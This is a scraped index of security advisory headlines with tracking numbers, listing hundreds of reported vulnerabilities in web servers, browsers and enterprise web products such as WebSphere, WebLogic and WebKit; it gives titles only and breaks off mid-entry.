[1025678] Hitachi Web Server Unspecified Directory Indexing Flaw Lets Remote Users Deny Service [1025676] Mozilla Firefox WebGL Implementation Flaw Lets Remote Users Obtain Graphics Memory Contents [1025672] Sunway ForceControl Heap Overflow in WebServer Lets Remote Users Execute Arbitrary Code [1025665] IBM WebSphere Application Server Permits Cross-Site Request Forgery Attacks [1025653] Microsoft Active Directory Input Validation Flaw in Certificate Services Web Enrollment Permits Cross-Site Scripting Attacks [1025617] Subversion mod_dav_svn Baselined WebDAV Request Processing Lets Remote Users Deny Service [1025607] WebSVN Input Validation Flaw in 'dl.php' Lets Remote Users Execute Arbitrary Code [1025567] Cisco IOS XR SPA Interface Processor IPv4 Packet Processing Flaw Lets Remote Users Deny Service [1025564] Cisco Content Delivery System Internet Streamer Web Server Can Be Crashed By Remote Users [1025562] IBM WebSphere Input Validation Hole Permits Cross-Site Scripting Attacks [1025559] Mitel Audio and Web Conferencing Input Validation Flaws Permit Cross-Site Scripting Attacks [1025514] Palm webOS Flaws Let Remote Users Write to the File System or Execute Arbitrary Code [1025447] Trustwave WebDefend Enterprise Default Credentials Let Remote Users Access the Device [1025446] Trustwave WebDefend Enterprise Manager Appliance Lets Remote Authenticated 'bgoperator' Users Gain Root Privileges [1025444] CA Arcot WebFort Versatile Authentication Server Input Validation Flaws Permit Cross-Site Scripting and URL Redirection Attacks [1025438] Webmin Unescaped Full Name Value Permits Cross-Site Scripting Attacks [1025424] CA Output Management Web Viewer ActiveX Controls Lets Remote Users Execute Arbitrary Code [1025370] SAP Web Application Server ITSmobile Input Validation Flaws Permit Cross-Site Scripting Attacks [1025356] BlackBerry Enterprise Server Input Validation Flaw in BlackBerry Web Desktop Manager Permits Cross-Site Scripting Attacks [1025298] WebCalendar Input Validation Flaw in 'edit_entry.php' Permits Cross-Site Scripting Attacks [1025285] IBM WEBi Input Validation Hole Permits Cross-Site Scripting Attacks [1025271] Cisco Secure Access Control System Management Interface Bug Lets Remote Users Change Arbitrary User Passwords [1025223] Asterisk Manager Interface Bug Lets Remote Users Consume Excessive Resources [1025220] TIBCO tibbr Input Validation Hole in Web Service Permits Cross-Site Scripting Attacks [1025212] Blackberry Device Software Bug in WebKit Lets Remote Users Execute Code [1025156] IBM Tivoli Netcool OMNIbus Input Validation Flaw in Web GUI Lets Remote Users Inject SQL Commands [1025130] HP Web Jetadmin Lets Local Users Access Managed Resources [1025118] Cisco Secure Desktop CSDWebInstaller Bugs Let Remote Users Execute Arbitrary Code [1025019] IBM Rational Build Forge Input Validation Flaw in User Interface Permits Cross-Site Scripting Attacks [1025016] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1025015] Cisco WebEx Player and WebEx Meeting Center Stack Overflows Let Remote Users Execute Arbitrary Code [1025013] CouchDB Input Validation Hole in Administration User Interface Permits Cross-Site Scripting Attacks [1024958] Symantec Web Gateway Input Validation Flaw Lets Remote Users Inject SQL Commands [1024905] GIT gitweb Input Validation Flaw Permits Cross-Site Scripting Attacks [1024882] Windows Consent User Interface Lets Local Users Gain Elevated Privileges [1024845] IBM WebSphere Commerce May Disclose One User's Messages to Another User [1024842] WordPress XML-RPC Interface Bug Lets Remote Authenticated Users Modify Posts [1024827] HP webOS Unspecified Flaw in Contacts Application Lets Remote Users Execute Arbitrary Code [1024789] IBM WebSphere MQ Internet pass-thru Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1024741] HP LaserJet Printer Printer Job Language (PJL) Interface Directory Traversal Flaw Lets Remote Users View Arbitrary Files [1024686] IBM WebSphere Application Server Input Validation Hole in Administrative Console Permits Cross-Site Scripting Attacks [1024658] Palm webOS Camera Application Lets Local Users Overwrite Arbitrary Files [1024657] HP LoadRunner Web Tours Lets Remote Users Deny Service [1024656] Palm webOS Doc Viewer Flaw in Processing Word Documents Lets Remote Users Deny Service [1024647] Palm webOS Flaw in Service API Lets Local Users Gain Elevated Privileges [1024569] Oracle WebLogic Node Manager Remote Configuration Capability Lets Remote Users Execute Arbitrary Commands [1024541] IBM WebSphere Application Server for z/OS Permits Cross-Site Request Forgery Attacks [1024540] IBM WebSphere Application Server for z/OS Input Validation Flaw Permits Cross-Site Scripting Attacks [1024496] Microsoft Internet Information Server (IIS) Web Server Stack Overflow in Reading POST Data Lets Remote Users Deny Service [1024478] RSA Authentication Agent for Web Lets Remote Users Traverse the Directory [1024451] IBM Lotus Sametime Connect Has Unspecified Web Container Flaw With Unspecified Impact [1024445] Microsoft Outlook Web Access Authentication Flaw Lets Remote Users Hijack User Sessions [1024354] WebEx Player ARF String Parsing Heap Overflow Lets Remote Users Execute Arbitrary Code [1024343] Palm webOS Unspecified Flaws Have Unspecified Impact [1024342] Palm webOS vCard Processing Flaw Lets Remote Users Execute Arbitrary Code [1024320] Windows Telephony Application Programming Interfaces Lets Certain Local Users Gain Elevated Privileges [1024250] Mac OS X WebDAV Memory Allocation Error Lets Local Users Deny Service [1024248] Nessus Web Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1024214] SAP J2EE Engine Input Validation Flaw in Web Services Navigator Permits Cross-Site Scripting Attacks [1024204] Oracle WebLogic Plugin Encoding Error Lets Remote Users Inject HTTP Headers [1024163] Trend Micro InterScan Web Security Virtual Appliance Input Validation Hole Permits Cross-Site Scripting Attacks [1024153] Trend Micro InterScan Web Security Virtual Appliance Flaws Let Local Users Gain Elevated Privileges and Remote Users Upload/Download Arbitrary Files [1024133] IBM WebSphere Application Server Axis2 Flaw Lets Remote Users View Arbitrary Files [1024123] CUPS Administrative Interface Lets Remote Users Obtain Potentially Sensitive Memory Contents [1024114] SAP J2EE Engine Telnet Interface Lets Remote Authenticated Users Bypass Some Administrative Access Controls [1024108] Apple iTunes WebKit Bugs Let Remote Users Execute Arbitrary Code [1024105] Ruby WEBrick Server Input Validation Flaw in Error Pages Permits Cross-Site Scripting Attacks [1024083] Cisco Application Extension Platform Tech Support Command Line Interface Lets Remote Authenticated Users Gain Administrative Privileges [1024048] Websense 'Via:' Header Lets Remote Users Bypass Filtering and Monitoring [1023961] IBM WebSphere MQ Channel Control Process Can Be Crashed By Remote Authenticated Users [1023917] JBoss Application Server Web Console Flaw Lets Remote Users Bypass Authentication [1023915] Palm Pre WebOS Input Validation Flaw Lets Remote Users Inject Commands [1023830] IBM WebSphere Portal Login Flaw Has Unspecified Impact [1023827] CA XOsoft SOAP Interface Discloses Potentially Sensitive Information to Remote Users [1023826] CA XOsoft SOAP Interface Discloses Valid Usernames to Remote Users [1023820] Sun Java System Web Server Discloses Contents of Arbitrary Files to Remote Users [1023818] uTorrent HTTP Basic Authentication Processing Flaw in WebUI Lets Remote Users Deny Service [1023802] IBM WEBi Input Validation Flaw Permits Cross-Site Scripting Attacks [1023770] VMware ESX Server Input Validation Flaws in WebAccess Permit Cross-Site Scripting Attacks [1023769] VMware Server Input Validation Flaws in WebAccess Permit Cross-Site Scripting Attacks [1023726] IBM DB2 Content Manager Web Services Single Sign-on Flaw Has Unspecified Impact [1023708] Apple Safari WebKit Flaws Let Remote Users Execute Arbitrary Code [1023683] CA SiteMinder Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks [1023660] IBM WebSphere Portal Input Validation Hole in 'login.jsp' Permits Cross-Site Scripting Attacks [1023645] IBM WebSphere Portal Input Validation Flaw Permits Cross-Site Scripting Attacks [1023611] Mozilla Firefox Web Workers Array Buffer Overflow Lets Remote Users Execute Arbitrary Code [1023603] GNOME NetworkManager nm-connection-editor D-Bus Interface Discloses Configuration Data to Local Users [1023551] IBM WebSphere Application Server Single Signon &quot [1023502] Oracle WebLogic Node Manager Lets Remote Users Execute Commands [1023499] Sun Java System Web Server WebDAV Format String Flaw Lets Remote Users Deny Service [1023498] Sun Java System Web Server Administration Server Null Pointer Dereference Lets Remote Users Deny Service [1023488] Sun Java System Web Server Heap Overflow in Processing HTTP Digest Authentication Requests Lets Remote Users Execute Arbitary Code [1023487] Sun Java System Web Server Heap Overflow in Processing WebDAV Requests Lets Remote Users Execute Arbitary Code [1023477] SAP Web Application Server Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1023469] Sun Java System Web Server Heap Overflow in Processing TRACE Requests Lets Remote Users Execute Arbitary Code [1023465] Zeus Web Server Buffer Overflow in SSL Implementation Lets Remote Users Execute Arbitrary Code [1023463] IBM Lotus Web Content Management Input Validation Flaw in Login Page Permits Cross-Site Scripting Attacks [1023457] HP Web Jetadmin Unprotected SQL Server Connection Lets Remote Users Access Data and Deny Service [1023450] IBM Lotus Domino Web Access Input Validation Holes Permit Cross-Site Scripting Attacks [1023442] Oracle BEA WebLogic Server and Portal Bugs Let Remote Users Access and Modify Data and Deny Service [1023429] Ruby WEBrick Input Validation Flaw Lets Remote Users Inject Terminal Commands [1023427] Sun Java System Web Proxy Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023426] Sun Java System Web Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023411] Red Hat JBoss Enterprise Web Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks [1023368] Cisco ASA WebVPN Bookmark List Can Be Bypassed By Remote Authenticated Users [1023360] Cisco WebEx WRF Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1023355] Easy File Sharing Web Server Discloses File Listing Database to Remote Users [1023329] VMware ESX Server Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks [1023328] VMware Server, Lab Manager, and vCenter Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks [1023318] HP-UX Buffer Overflow in VRTSweb Lets Remote Users Execute Arbitrary Code [1023315] JBoss Enterprise Application Platform Input Validation Holes in the JMX Console and Web Console Permits Cross-Site Scripting Attacks [1023313] Veritas Cluster Server Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code [1023312] Symantec Veritas NetBackup Manager Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code [1023311] Symantec Backup Exec Continuous Protection Server Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code [1023309] Symantec Veritas Storage Foundation Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code [1023303] CA Service Desk Input Validation Flaws in 'webengine' and 'freeaccess.spl' Permit Cross-Site Scripting Attacks [1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites [1023255] Cisco ASA Clientless SSL VPN Feature Lets Remote Users Bypass Web Browser Same-Origin Policy Restrictions [1023181] IBM WebSphere Application Server Input Validation Flaw in Administrative Console Permits Cross-Site Scripting Attacks [1023166] Apple Safari WebKit FTP Parsing Bugs Let Remote Users Cause Arbitrary Code to Be Executed [1023165] Apple Safari WebKit Flaw Lets Remote Users Bypass Cross-Origin Resource Sharing Controls [1023153] Microsoft Web Services on Devices API (WSDAPI) Validation Error Lets Remote Users Execute Arbitrary Code [1023141] Sun Virtual Desktop Infrastructure VirtualBox Web Service Grants Access to Remote Users [1023095] Cherokee Web Server GET AUX Request Lets Remote Users Deny Service [1023070] Websense Email Security 'STEMWADM.EXE' Service Can Be Crashed By Remote Users [1023062] Oracle BEA WebLogic Server and Portal Bugs Let Remote Authenticated Users Modify Data [1023049] IBM Rational RequisitePro Input Validation Flaw in ReqWebHelp Permits Cross-Site Scripting Attacks [1022987] Palm webOS JavaScript Directory Traversal Flaw Lets Remote Users Access Files on the Target Device [1022962] JUNOS J-Web Input Validation Holes Permit Cross-Site Scripting Attacks [1022910] Novell GroupWise WebAccess Input Validation Hole in 'User.Theme.index' Parameter Permits Cross-Site Scripting Attacks [1022905] HP StorageWorks Remote Management Interface Lets Remote Users Deny Service [1022903] Bugzilla Input Validation Flaw in Bug.search and Bug.create WebService Functions Lets Remote Users Inject SQL Commands [1022888] IBM WebSphere MQ Bugs Let Remote Users Deny Service [1022862] IBM WebSphere Application Server doGet/doTrace Method Flaw Lets Remote Users Bypass Security Restrictions [1022838] IBM Lotus Domino Web Access Input Validation Flaw Permits Cross-Site Scripting Attacks [1022829] McAfee Email and Web Security Appliance Discloses Arbitrary Files to Remote Users [1022820] Java Web Start Stack Overflow in Command Launcher Lets Remote Users Execute Arbitrary Code [1022791] Xerox WorkCentre Web Server Can Be Accessed By Remote Users [1022753] IBM WebSphere Input Validation Flaw in Partner Gateway Console Lets Remote Users Inject SQL Commands [1022735] IBM WebSphere Application Server Flaw in SCA Feature Pack Lets Remote Authenticated Users Bypass Access Controls [1022708] Microsoft Office Web Components Buffer Overflows in ActiveX Control Let Remote Users Execute Arbitrary Code [1022654] Palm webOS E-mail Notification and Calendar Event Filtering Flaws Let Remote Users Execute Arbitrary HTML Code [1022604] CommuniGate Pro Input Validation Flaw in WebUser Component Permits Cross-Site Scripting Attacks [1022598] Sun Java System Access Manager Policy Agent Bug Lets Remote Users Deny Service to the Web Proxy Server [1022597] IBM Tivoli Identity Manager Console and Self Service Interface Session Fixation Bug Lets Remote Users Hijack Sessions [1022561] WebLogic Server Bugs Let Remote Users Gain Access and Modify Data and Deny Service [1022535] Microsoft Office Web Components Bug in Spreadsheet ActiveX Control Lets Remote Users Execute Arbitrary Code [1022526] Apple Safari WebKit Bug in Procesing Numeric Character References Lets Remote Users Execute Arbitrary Code [1022525] Apple Safari Flaw in WebKit in Processing Parent and Top Objects Lets Remote Users Conduct Cross-Site Scripting Attacks [1022520] Citrix XenCenterWeb Multiple Flaws Permit Cross-Site Scripting, SQL Injection, and Remote Command Execution Attacks [1022511] Sun Java System Web Server Discloses JSP Source Code to Remote Users [1022479] Sun Java Web Console Input Validation Holes Permit Cross-Site Scripting Attacks [1022367] FreeBSD SIOCSIFINFO_IN6 IOCTL Access Bug Lets Local Users Modify IPv6 Interface Properties [1022358] Microsoft Internet Information Services WebDAV Bug Lets Remote Users Bypass Authentication [1022336] Tomcat Bug Lets Web Applications Access the Files of Other Web Applications [1022334] Sun Java System Web Server Input Validation Hole in Reverse Proxy Plug-in Permits Cross-Site Scripting Attacks [1022311] IBM WebSphere MQ Buffer Overflow Lets Remote Users Execute Arbitrary Code [1022267] Novell GroupWise WebAccess Input Validation Flaw in Login Page Permits Cross-Site Scripting Attacks [1022240] Microsoft Internet Information Server WebDAV Input Validation Flaw Lets Remote Users Execute Arbitrary Code [1022236] Nortel Contact Center SOAP Interface Discloses 'sysadmin' Password to Remote Users [1022207] Apple Safari Buffer Overflow in WebKit in Processing SVGList Objects Lets Remote Users Execute Arbitrary Code [1022169] IceWarp WebMail Server Input Validation Flaw in Groupware Component Lets Remote Users Inject SQL Commands [1022168] IceWarp WebMail Server Input Validation Hole in RSS Feed Reader Permits Cross-Site Scripting Attacks [1022167] IceWarp WebMail Server Input Validation Flaw in 'Email View' Permits Cross-Site Scripting Attacks [1022166] IceWarp WebMail Server Password Reminder Lets Remote Users Inject Mail Header Values [1022159] GnuTLS Command Line Interface Does Not Properly Validate X.509 Certificates [1022115] Xitami Web Server HEAD Request Processing Flaw Lets Remote Users Deny Service [1022095] Mozilla Firefox 'jar:' Scheme Error Processing the 'content-disposition:' Header May Affect Some Web Sites [1022061] DivX Web Player Heap Overflow in Processing Stream Format Chunks Lets Remote Users Execute Arbitrary Code [1022059] Oracle WebLogic Server and Portal Bugs Let Remote Users Access and Modify Data and Cause Denial of Service Conditions [1021971] IBM WebSphere Application Server Interim Fix File Permissions May Let Local Users Gain Elevated Privileges [1021948] [Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact [1021896] Cisco IOS WebVPN and SSLVPN Bugs Let Remote Users Deny Service [1021811] IBM WebSphere Input Validation Flaw in z/OS Sample Application Permits Cross-Site Scripting Attacks [1021740] IBM WebSphere Partner Gateway RNIF Signature Validation Flaw Lets Remote Users Bypass Security Checks [1021735] IBM WebSphere Message Broker Discloses Passwords to Local Users [1021716] InterScan Web Security Suite Discloses Proxy-Authentication Password [1021709] TYPO3 Input Validation Flaws in Backend User Interface Permit Cross-Site Scripting Attacks [1021705] BlackBerry Application Web Loader Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1021694] Trend Micro InterScan Web Security Suite Lets Certain Remote Authenticated Users Gain Elevated Privileges [1021658] IBM WebSphere Discloses Files to Remote Users [1021571] WebLogic Bugs Let Remote Users Execute Arbitary Code, Acces and Modify Information, and Deny Service [1021547] IBM WebSphere DataPower Security Gateway Can Be Crashed By Remote Users [1021484] webcamXP Discloses Files to Remote Users [1021475] Fujitsu-Siemens WebTransactions Input Validation Flaw Lets Remote Users Execute Arbitrary Commands [1021318] Java Web Start Bugs Let Remote Users Read/Write Files, Execute Arbitrary Code, and Establish Network Connections [1021295] Rational ClearCase Input Validation Flaw in Rational Web Platform Permits Cross-Site Scripting Attacks [1021274] IBM Workplace Web Content Management Input Validation Hole Permits Cross-Site Scripting Attacks [1021272] Apple iPhone Safari Bugs Let Remote Users Spoof the Interface and Execute Arbitrary Code [1021058] Websense Enterprise Reporter Module Saves the SQL Database SA Password to Local Users [1021056] WebLogic Bugs Let Remote Users Execute Arbitary Code, Acces and Modify Information, and Deny Service [1021038] Sun Java System Web Proxy Server Bug in FTP Subsystem Lets Remote Users Execute Arbitrary Code [1021030] Mac OS X Weblog ACL Bug May Let Remote Users Bypass Weblog Posting Access Controls [1020949] CA Service Desk Input Validation Holes in Several Web Forms Permit Cross-Site Scripting Attacks [1020732] Trend Micro OfficeScan Insufficient Randomization Lets Remote Users Bypass Web Console Authentication [1020726] Fujitsu Web-Based Admin View Input Validation Flaw Lets Remote Users Traverse the Directory [1020712] IBM WebSphere Portal Bug Lets Remote Users Bypass Authentication [1020696] Sun Java Web Proxy Server FTP Subsystem Bug Lets Remote Users Deny Service [1020657] Alcatel OmniSwitch Management Web Server Stack Overflow Lets Remote Users Execute Arbitrary Code [1020654] Ruby WEBrick HTTP Server split_header_value() Function Regex Bug Lets Remote Users Deny Service [1020642] Rational ClearQuest Input Validation Hole in CQWeb Login Page Permits Cross-Site Scripting Attacks [1020641] Webex Meeting Manager Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code [1020608] Sun N1 Service Provisioning System Administration Console Grants Access to Managed Sun Java System Web Server Systems [1020588] K9 Web Protection Buffer Overflows in Processing HTTP Responses From the Centralized Server Lets Remote Users Execute Arbitrary Code [1020587] K9 Web Protection Buffer Overflows in Processing HTTP Headers Lets Remote Users Execute Arbitrary Code [1020528] IBM WebSphere Bug in PropFilePasswordEncoder Utility Has Unspecified Impact [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code [1020515] Citrix XenServer Input Validation Flaw in XenAPI HTTP Interface Permits Cross-Site Scripting Attacks [1020498] Oracle WebLogic Server Bugs Let Remote Users Access and Modify Data and Cause Denial of Service Conditions [1020473] Apple Xcode May Disclose WebObjects Session IDs to Remote Users [1020452] Java Web Start Bugs Let Remote Users Gain Privileges on the Target System [1020439] Microsoft Outlook Web Access for Exchange Server Input Validation Bugs Permit Cross-Site Scripting Attacks [1020357] WebCalendar Include File Bug in 'send_reminders.php' Lets Remote Users Execute Arbitrary Code [1020330] Safari for Windows WebKit JavaScript Array Memory Corrpution Bug Lets Remote Users Execute Arbitrary Code [1020281] Xerox WorkCentre Extensible Interface Platform Bug Lets Remote Users Modify the Configuration [1020237] Linksys WRH54G Router Management Interface Can Be Crashed By Remote Users [1020168] IBM WebSphere Unspecified SOAP Security Header Flaw Has Unspecified Impact [1020110] Sun Java System Web Server Input Validation Hole in Advanced Search Permits Cross-Site Scripting Attacks [1020098] IBM Lotus Domino Web Server Stack Overflow in Processing HTTP 'Accept-Language' Header Lets Remote Users Execute Arbitrary Code [1020097] SAP Web Application Server Input Validation Hole in webgui Permits Cross-Site Scripting Attacks [1019987] Sun Java System Web Server Input Validation Hole in Search Module Permits Cross-Site Scripting Attacks [1019985] Sun Java System Web Server Discloses JSP Source Code to Remote Users [1019968] Bugzilla XML-RPC Interface Bug Lets Remote Users Create Confirmed Bugs [1019956] IBM WebSphere Java Plug-in Bug Lets Remote Users Gain Privileges [1019894] IBM WebSphere Unspecified Flaw in Servlet Engine Has Unspecified Impact [1019870] Safari WebKit Bug in Processing JavaScript Regular Expressions Lets Remote Users Execute Arbitrary Code [1019869] Safari WebKit Input Validation Bug in Processing URLs Permits Cross-Site Scripting Attacks [1019846] Nortel Communication Server 1000 Discloses Web Application Structure to Remote Users [1019655] Safari CFNetwork Bug Lets Remote Proxy Servers Spoof Secure Web Sites [1019654] Safari WebKit Buffer Overflow Lets Remote Users Execute Arbitrary Code [1019624] VMware Virtual Machine Communication Interface Memory Corruption Flaw Lets Local Users Deny Service [1019610] IBM WebSphere MQ for HP NonStop Server Lets Local Users Perform Administrative Tasks [1019581] Microsoft Office Web Components DataSource Bug Lets Remote Users Execute Arbitrary Code [1019580] Microsoft Office Web Components URL Parsing Bug Lets Remote Users Execute Arbitrary Code [1019574] Sun Java Web Console Discloses Whether Files or Directories Exist [1019566] Rational ClearQuest Web Login Page Discloses Username Validity to Remote Users [1019562] Ruby Directory Traversal Flaw in WEBrick Library Lets Remote Users View Files on the Target System. [1019552] Java Web Start Buffer Overflow Lets Remote Users Read/Write Files and Execute Applications on the Target User's System [1019549] Java Web Start Buffer Overflows and Other Bugs Let Remote Users Read/Write Files and Execute Applications on the Target User's System [1019529] IBM WebSphere MQ Lets Local Users Gain Elevated Privileges in COM+ or .NET Environments [1019527] IBM WebSphere MQ Lets Local Users Bypass Queue Manager Access Restrictions [1019455] WebLogic Portal Discloses Web Service WSDL and Policy to Remote Users [1019454] WebLogic Portal Administrative Policy Errors May Let Remote Users Access Restricted Pages [1019453] WebLogic Portal Entitlement Deletion Bug May Let Remote Users Access Portlets [1019452] WebLogic Portal Input Validation Hole in Groupspace Function Permits Cross-Site Scripting Attacks [1019451] WebLogic Portal Lets Remote Users Bypass Entitlements [1019450] WebLogic Proxy Plugin Lets Remote Users Deny Service [1019449] WebLogic Lets Remote Users Bypass the Account Lockout Feature [1019448] WebLogic Server Administration Console Input Validation Hole Permits Cross-Site Scripting Attacks [1019447] WebLogic Bug Lets Remote Users Bypass Security Policy and Send Messages to a Queue [1019444] WebLogic Security Policy Bug May Let Remote Users Access JMS Messages [1019443] WebLogic Servlets May Grant Access to Remote Users Based on Modified HTTP Request Header Values [1019442] WebLogic Portal Administration Console May Use Non-Secure Sessions [1019441] WebLogic Workshop NetUI Input Validation Bugs Permit Cross-Site Scripting Attacks [1019439] WebLogic Server and WebLogic Express Session Security Bug Lets Remote Authenticated Users Gain Elevated Privileges [1019438] WebLogic Workshop Input Validation Hole Permits Cross-Site Scripting Attacks [1019372] Windows WebDAV Mini-Redirector Response Handling Bug Lets Remote Users Execute Arbitrary Code [1019370] Webmin Input Validation Hole in Processing HTTP Referer Values Permits Cross-Site Scripting Attacks [1019342] Mozilla Firefox Lets Remote Users Obscure Web Forgery Dialog Warnings. [1019334] Mozilla Firefox Lets Remote Web Sites Corrupt the Password Store in Certain Cases [1019315] IBM WebSphere Edge Server Input Validation Hole in CGI Mapping Error Page Permits Cross-Site Scripting Attacks [1019302] GroupWise Input Validation Hole in 'webacc' Permits Cross-Site Scripting Attacks [1019268] Web Wiz NewsPad Input Validation Flaw in 'FolderName' Parameter Lets Remote Users Traverse the Directory [1019267] Web Wiz Rich Text Editor Input Validation Flaw Lets Remote Users Traverse the Directory and Create HTML Files [1019266] Web Wiz Forums Input Validation Flaw in 'FolderName' Parameter Lets Remote Users Traverse the Directory [1019254] IBM WebSphere Bug in PropFilePasswordEncoder Utility Has Unspecified Impact [1019252] IBM WebSphere Business Modeler Lets Remote Authenticated Users Delete Repository Objects [1019251] IBM WebSphere Bug in serveServletsByClassnameEnabled Feature Has Unspecified Impact [1019174] IBM WebSphere Bug in Administrative Console Has Unspecified Impact [1019138] IBM Domino Web Access 'dwa7w.dll' ActiveX Control Buffer Overflow May Let Remote Users Execute Arbitrary Code [1019094] Websense Enterprise Lets Remote Users Bypass Web Filtering With Modified User-Agent Values [1019091] WebLogic Mobility Server Image Converter Lets Remote Users Access Resources [1019066] Websense Input Validation Hole in 'username' Parameter Permits Cross-Site Scripting Attacks [1019053] IBM Lotus Sametime Input Validation Hole in WebRunMenuFrame Page Permits Cross-Site Scripting Attacks [1019033] Microsoft Web Proxy Auto-Discovery Name Server Resolution Bug Lets Remote Users Conduct Man-in-the-Middle Attacks [1018963] IBM WebSphere Input Validation Hole in 'Expect' Header Permits Cross-Site Scripting Attacks [1018948] Mac OS X WebCore/WebKit Bugs Let Remote Users Execute Arbitrary Code [1018904] Cisco Unified MeetingPlace Web Conferencing Input Validation Hole Permits Cross-Site Scripting Attacks [1018891] SonicWALL SSL-VPN Client Buffer Overflows in WebCacheCleaner/NeLaunchCtrl ActiveX Controls Let Remote Users Execute Arbitrary Code [1018884] IBM WebSphere Application Server Input Validation Hole in 'uddigui/navigateTree.do' Page Permits Cross-Site Scripting Attacks [1018877] IBM WebSphere Application Server API Grants Access to Remote Users [1018864] Tomcat WebDAV Servlet Lets Remote Users View Arbitrary Files [1018829] Cisco Unified Contact Center Grants Access to Certain Users to Read Web View Report Information [1018820] IBM WebSphere Unspecified Flaw in 'wsadmin' Has Unspecified Impact [1018814] Java Web Start Bugs Let Remote Users Rename/Copy Files on the Target User's System [1018783] MailBee WebMail Pro Input Validation Hole Permits Cross-Site Scripting Attacks [1018770] Java Web Start Bugs Let Remote Users Read/Write Files on the Target User's System [1018738] Solaris Human Interface Device Driver Bug Lets Local Users Deny Service [1018733] Barracuda Spam Firewall Input Validation Hole in 'Monitor Web Syslog' Page Permits Cross-Site Scripting Attacks [1018731] Webmin URL Parameter Validation Flaw Lets Remote Users Execute Arbitrary Commands [1018719] Bugzilla WebService Lets Remote Users Create Accounts [1018666] IBM WebSphere Unspecified Flaw in Edge Component Has Unspecified Impact [1018641] Aztech Router Lets Remote Users Access the Management Interface Via TCP Spoofing [1018622] MSN Messenger Buffer Overflow in Processing Webcam Streams Lets Remote Users Execute Arbitrary Code [1018620] WebLogic SSL Server May Use Null Encryption [1018619] WebLogic SSL Clients May Use Null Encryption [1018601] WebSVN Input Validation Hole in 'filedetails.php' Permits Cross-Site Scripting Attacks [1018596] eCentrex Web Phone Buffer Overflow in 'uacomx.ocx' ActiveX Control Lets Remote Users Execute Arbitrary Code [1018586] Yahoo Messenger Heap Overflow in Processing Webcam Streams Lets Remote Users Execute Arbitrary Code [1018584] Adonis Command Line Interface Lets Local Administrative Users Gain Root Privileges [1018504] Sun Java System Web Server Redirect URL Encoding Bug Lets Remote Users Conduct HTTP Response Splitting Attacks [1018494] Mac OS X WebCore Bugs Permit Cross-Domain Scripting Attacks and Java Settings Bypass [1018448] IBM WebSphere Input Validation Hole in Sample Application Permits Cross-Site Scripting Attacks [1018435] Citrix Access Gateway Unspecified Bugs Let Remote Users Execute Arbitrary Code, Access Active Sessions, Make Configuration Changes, and Redirect Web Users [1018354] Windows Vista Firewall Teredo Interface Discloses Network Information to Remote Users and May Let Remote Users Bypass Firewall Rules [1018346] Java Web Start JNLP Stack Overflow Lets Remote Users [1018341] SAP DB Web Server Stack Overflow Lets Remote Users Execute Arbitrary Code [1018328] Java Web Start Applet Privilege Escalation Bug Lets Remote Users Execute Arbitrary Code [1018288] IBM WebSphere May Disclose One Users Information to Another User in Certain Cases [1018281] Mac OS X WebKit and WebCore Bugs Permit Cross-Domain Scripting Attacks and Remote Code Execution [1018210] Blue Coat Systems K9 Web Protection Buffer Overflow May Let Remote Users Execute Arbitrary Code [1018204] Yahoo Messenger Buffer Overflows in Webcam ActiveX Controls Let Remote Users Execute Arbitrary Code [1018189] IBM Lotus Domino Web Service Can Be Crashed With Specially Crafted URLs [1018178] IBM WebSM Lets Remote Users Deny Service [1018130] Sun Java System Web Proxy Server Buffer Overflows in 'sockd' Let Remote Users Execute Arbitrary Code [1018067] Check Point Web Intelligence Lets Remote Users Evade Detection With Certain Character Encodings [1018060] WebLogic Portal Input Validation Hole Permits Cross-Site Scripting Attacks and Entitlement Bug Lets Remote Users Access Resources [1018059] BEA WebLogic Integration Directory Traversal Bug Lets Remote Users List Certain Directories [1018057] BEA WebLogic Server Multiple Bugs Let Remote Users Deny Service, Gain Elevated Privileges [1017986] Java Web Start Incorrect Use of System Classes Lets Users Gain Elevated Privileges [1017976] IBM WebSphere Unspecified Flaw Has Unspecified Impact [1017955] Asterisk Manager Interface NULL Pointer Dereference Lets Remote Users Deny Service [1017932] Novell GroupWise WebAccess Buffer Overflow in Processing HTTP Basic Authentication Lets Remote Users Execute Arbitrary Code [1017930] Sun Java Web Console Format String Bug Lets Remote Users Execute Arbitrary Code [1017929] McAfee E-Business Server Administration Interface Can Be Crashed By Remote Users Sending Invalid Packet Length Header Values [1017926] webMethods Glue 'resource' Parameter Lets Remote Users Traverse the Directory [1017881] Symantec Enterprise Security Manager Upgrade Interface Lets Remote Users Execute Arbitrary Code [1017870] IBM Lotus Domino Web Access Input Validation Hole in Processing Multipart MIME Messages Permits Cross-Site Scripting Attacks [1017824] IBM Lotus Domino Web Access Input Validation Hole Permits Cross-Site Scripting Attacks [1017806] IBM WebSphere CRLF Validation Bug Permits HTTP Response Splitting Attacks [1017788] Sun Java System Web Server Sample Application Lets Remote Users Obtain Data [1017777] Sun Java System Web Server May Let a Remote User With a Revoked Client Certificate Access the System [1017740] CA eTrust Admin GINA Password Reset Interface Lets Users Gain Privileged Access [1017734] Novell NetMail Buffer Overflow in WebAdmin Lets Remote Users Execute Arbitrary Code [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code [1017711] Webmin Input Validation Hole in 'chooser.cgi' Permits 